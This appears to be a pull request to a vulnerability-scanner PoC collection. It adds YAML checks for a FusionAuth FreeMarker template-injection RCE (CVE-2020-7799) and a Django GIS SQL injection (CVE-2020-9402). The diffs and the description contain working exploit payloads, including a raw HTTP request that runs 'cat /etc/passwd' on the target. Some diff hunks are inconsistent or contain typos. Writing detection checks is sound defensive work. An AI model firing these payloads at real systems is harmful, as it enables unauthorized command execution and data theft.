### PR TITLE
（CVE-2020-7799） Apache FreeMarker模板FusionAuth远程代码执行漏洞

### DIFF
--- a/pocs/apache-fusionauth-cve-2020-7799-rce.yml
+++ b/pocs/apache-fusionauth-cve-2020-7799-rce.yml
@@ -17,7 +17,7 @@ rules:
     body: primeCSRFToken=kRC228UjAA4ohN_E9PW9kz0HpTlxUDCB_HVrDhBUfWU&emailTemplateId=2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b&emailTemplate.name=COPPA%20Notice&emailTemplate.defaultSubject=Notice%20of%20your%20consent&emailTemplate.fromEmail=no-reply%40fusionauth.io&emailTemplate.defaultFromName=FusionAuth&emailTemplate.defaultTextTemplate=You%20recently%20granted%20your%20child%20consent%20in%20our%20system.%20This%20email%20is%20to%20notify%20you%20of%20this%20consent.%20If%20you%20did%20not%20grant%20this%20consent%20or%20wish%20to%20revoke%20this%20consent%2C%20click%20the%20link%20below%3A%0A%0Ahttp%3A%2F%2Fexample.com%2Fconsent%2Fmanage%0A%0A-%20FusionAuth%20Admin&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("echo {{r}}")}}
     follow_redirects: true
     expression: >
-      response.status == 200 && response.body.bcontains(bytes(string(rand)))
+      response.status == 200 && response.body.bcontains(bytes(string(r)))
 detail:
 
   author: rocky(https://github.com/rockmelodies)

--- a/pocs/apache-fusionauth-cve-2020-7799-rce.yml
+++ b/pocs/apache-fusionauth-cve-2020-7799-rce.yml
@@ -17,7 +17,7 @@ rules:
     body: primeCSRFToken=kRC228UjAA4ohN_E9PW9kz0HpTlxUDCB_HVrDhBUfWU&emailTemplateId=2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b&emailTemplate.name=COPPA%20Notice&emailTemplate.defaultSubject=Notice%20of%20your%20consent&emailTemplate.fromEmail=no-reply%40fusionauth.io&emailTemplate.defaultFromName=FusionAuth&emailTemplate.defaultTextTemplate=You%20recently%20granted%20your%20child%20consent%20in%20our%20system.%20This%20email%20is%20to%20notify%20you%20of%20this%20consent.%20If%20you%20did%20not%20grant%20this%20consent%20or%20wish%20to%20revoke%20this%20consent%2C%20click%20the%20link%20below%3A%0A%0Ahttp%3A%2F%2Fexample.com%2Fconsent%2Fmanage%0A%0A-%20FusionAuth%20Admin&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("echo {{r}}")}}
     follow_redirects: true
     expression: >
-      response.status == 200 && response.body.bcontains(bytes({{r}}))
+      response.status == 200 && response.body.bcontains(bytes(string(rand))）
 detail:
   author: rocky
   links:

--- a/pocs/apache-fusionauth-cve-2020-7799-rce.yml
+++ b/pocs/apache-fusionauth-cve-2020-7799-rce.yml
@@ -19,6 +19,7 @@ rules:
     expression: >
       response.status == 200 && response.body.bcontains(bytes(string(rand)))
 detail:
+
   author: rocky(https://github.com/rockmelodies)
   links:
     - https://github.com/ianxtianxt/CVE-2020-7799/

--- a/pocs/apache-fusionauth-cve-2020-7799-rce.yml
+++ b/pocs/apache-fusionauth-cve-2020-7799-rce.yml
@@ -1,0 +1,38 @@
+name: poc-yaml-apache-fusionauth-cve-2020-7799-rce
+set:
+    r1: randomLowercase(8)
+    r2: randomLowercase(4)
+rules:
+    - method: GET
+      path: /jars
+      follow_redirects: true
+      expression: >
+        response.status == 200 && response.content_type.contains("json") &&
+        response.body.bcontains(b"address") && response.body.bcontains(b"files")
+    - method: POST
+      path: /jars/upload
+      headers:
+          Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
+      body: |-
+        --8ce4b16b22b58894aa86c421e8759df3
+        Content-Disposition: form-data; name="jarfile";filename="{{r2}}.jar"
+        Content-Type:application/octet-stream
+
+        {{r1}}
+        --8ce4b16b22b58894aa86c421e8759df3--
+
+      follow_redirects: true
+      expression: >
+        response.status == 200 && response.content_type.contains("json") &&
+        response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
+      search: >-
+        (?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))
+    - method: DELETE
+      path: '/jars/{{filen}}'
+      follow_redirects: true
+      expression: |
+        response.status == 200
+detail:
+    author: timwhite
+    links:
+        - https://github.com/LandGrey/flink-unauth-rce

--- a/pocs/apache-fusionauth-cve-2020-7799-rce.yml
+++ b/pocs/apache-fusionauth-cve-2020-7799-rce.yml
@@ -19,6 +19,6 @@ rules:
     expression: >
       response.status == 200 && response.body.bcontains(bytes(string(rand)))
 detail:
-  author: rocky
+  author: rocky(https://github.com/rockmelodies)
   links:
     - https://github.com/ianxtianxt/CVE-2020-7799/

--- a/pocs/apache-fusionauth-cve-2020-7799-rce.yml
+++ b/pocs/apache-fusionauth-cve-2020-7799-rce.yml
@@ -17,7 +17,7 @@ rules:
     body: primeCSRFToken=kRC228UjAA4ohN_E9PW9kz0HpTlxUDCB_HVrDhBUfWU&emailTemplateId=2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b&emailTemplate.name=COPPA%20Notice&emailTemplate.defaultSubject=Notice%20of%20your%20consent&emailTemplate.fromEmail=no-reply%40fusionauth.io&emailTemplate.defaultFromName=FusionAuth&emailTemplate.defaultTextTemplate=You%20recently%20granted%20your%20child%20consent%20in%20our%20system.%20This%20email%20is%20to%20notify%20you%20of%20this%20consent.%20If%20you%20did%20not%20grant%20this%20consent%20or%20wish%20to%20revoke%20this%20consent%2C%20click%20the%20link%20below%3A%0A%0Ahttp%3A%2F%2Fexample.com%2Fconsent%2Fmanage%0A%0A-%20FusionAuth%20Admin&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("echo {{r}}")}}
     follow_redirects: true
     expression: >
-      response.status == 200 && response.body.bcontains(bytes(string(rand))）
+      response.status == 200 && response.body.bcontains(bytes(string(rand)))
 detail:
   author: rocky
   links:

--- a/pocs/apache-fusionauth-cve-2020-7799-rce.yml
+++ b/pocs/apache-fusionauth-cve-2020-7799-rce.yml
@@ -9,8 +9,8 @@ rules:
       Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
       Accept-Encoding: gzip, deflate
       Content-Type: application/x-www-form-urlencoded
-      Content-Length: 796
-      DNT: 1
+      Content-Length: "796"
+      DNT: "1"
       Connection: close
       Referer: request.url + /admin/email/template/edit/2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b
       Cookie: JSESSIONID=FA9DB3CBABA6B37E5336AE4B96001807;
@@ -19,7 +19,6 @@ rules:
     expression: >
       response.status == 200 && response.body.bcontains(bytes(string(r)))
 detail:
-
   author: rocky(https://github.com/rockmelodies)
   links:
     - https://github.com/ianxtianxt/CVE-2020-7799/

--- a/pocs/apache-fusionauth-cve-2020-7799-rce.yml
+++ b/pocs/apache-fusionauth-cve-2020-7799-rce.yml
@@ -1,38 +1,24 @@
 name: poc-yaml-apache-fusionauth-cve-2020-7799-rce
 set:
-    r1: randomLowercase(8)
-    r2: randomLowercase(4)
+  r: randomInt(800000000, 1000000000)
 rules:
-    - method: GET
-      path: /jars
-      follow_redirects: true
-      expression: >
-        response.status == 200 && response.content_type.contains("json") &&
-        response.body.bcontains(b"address") && response.body.bcontains(b"files")
-    - method: POST
-      path: /jars/upload
-      headers:
-          Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
-      body: |-
-        --8ce4b16b22b58894aa86c421e8759df3
-        Content-Disposition: form-data; name="jarfile";filename="{{r2}}.jar"
-        Content-Type:application/octet-stream
-
-        {{r1}}
-        --8ce4b16b22b58894aa86c421e8759df3--
-
-      follow_redirects: true
-      expression: >
-        response.status == 200 && response.content_type.contains("json") &&
-        response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
-      search: >-
-        (?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))
-    - method: DELETE
-      path: '/jars/{{filen}}'
-      follow_redirects: true
-      expression: |
-        response.status == 200
+  - method: POST
+    path: /ajax/email/template/preview
+    headers:
+      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+      Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+      Accept-Encoding: gzip, deflate
+      Content-Type: application/x-www-form-urlencoded
+      Content-Length: 796
+      DNT: 1
+      Connection: close
+      Referer: request.url + /admin/email/template/edit/2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b
+      Cookie: JSESSIONID=FA9DB3CBABA6B37E5336AE4B96001807;
+    body: primeCSRFToken=kRC228UjAA4ohN_E9PW9kz0HpTlxUDCB_HVrDhBUfWU&emailTemplateId=2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b&emailTemplate.name=COPPA%20Notice&emailTemplate.defaultSubject=Notice%20of%20your%20consent&emailTemplate.fromEmail=no-reply%40fusionauth.io&emailTemplate.defaultFromName=FusionAuth&emailTemplate.defaultTextTemplate=You%20recently%20granted%20your%20child%20consent%20in%20our%20system.%20This%20email%20is%20to%20notify%20you%20of%20this%20consent.%20If%20you%20did%20not%20grant%20this%20consent%20or%20wish%20to%20revoke%20this%20consent%2C%20click%20the%20link%20below%3A%0A%0Ahttp%3A%2F%2Fexample.com%2Fconsent%2Fmanage%0A%0A-%20FusionAuth%20Admin&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("echo {{r}}")}}
+    follow_redirects: true
+    expression: >
+      response.status == 200 && response.body.bcontains(bytes({{r}}))
 detail:
-    author: timwhite
-    links:
-        - https://github.com/LandGrey/flink-unauth-rce
+  author: rocky
+  links:
+    - https://github.com/ianxtianxt/CVE-2020-7799/

--- a/pocs/django-gis-cve-2020-9402.yml
+++ b/pocs/django-gis-cve-2020-9402.yml
@@ -1,0 +1,10 @@
+name: poc-yaml-django-gis-cve-2020-9402
+rules:
+  - method: GET
+    path: /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1
+    expression: |
+      response.body.bcontains(b"DatabaseError")
+detail:
+  author: rocky
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
在FusionAuth 1.11.0版本之前的中发现了一个问题。经过身份验证的用户允许编辑电子邮件模板（主页->设置->电子邮件模板）或主题（主页->设置->主题），可利用freemarker.template.utility.Execute执行任意命令
## POC
POST /ajax/email/template/preview HTTP/1.1
Host: xxx:9011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 796
DNT: 1
Connection: close
Referer: http://xxxx:9011/admin/email/template/edit/2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b
Cookie: JSESSIONID=FA9DB3CBABA6B37E5336AE4B96001807; 

primeCSRFToken=kRC228UjAA4ohN_E9PW9kz0HpTlxUDCB_HVrDhBUfWU&emailTemplateId=2c2591f5-2136-4a77-8b5a-1f5e9fb0e25b&emailTemplate.name=COPPA%20Notice&emailTemplate.defaultSubject=Notice%20of%20your%20consent&emailTemplate.fromEmail=no-reply%40fusionauth.io&emailTemplate.defaultFromName=FusionAuth&emailTemplate.defaultTextTemplate=You%20recently%20granted%20your%20child%20consent%20in%20our%20system.%20This%20email%20is%20to%20notify%20you%20of%20this%20consent.%20If%20you%20did%20not%20grant%20this%20consent%20or%20wish%20to%20revoke%20this%20consent%2C%20click%20the%20link%20below%3A%0A%0Ahttp%3A%2F%2Fexample.com%2Fconsent%2Fmanage%0A%0A-%20FusionAuth%20Admin&emailTemplate.defaultHtmlTemplate=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}}

## 备注
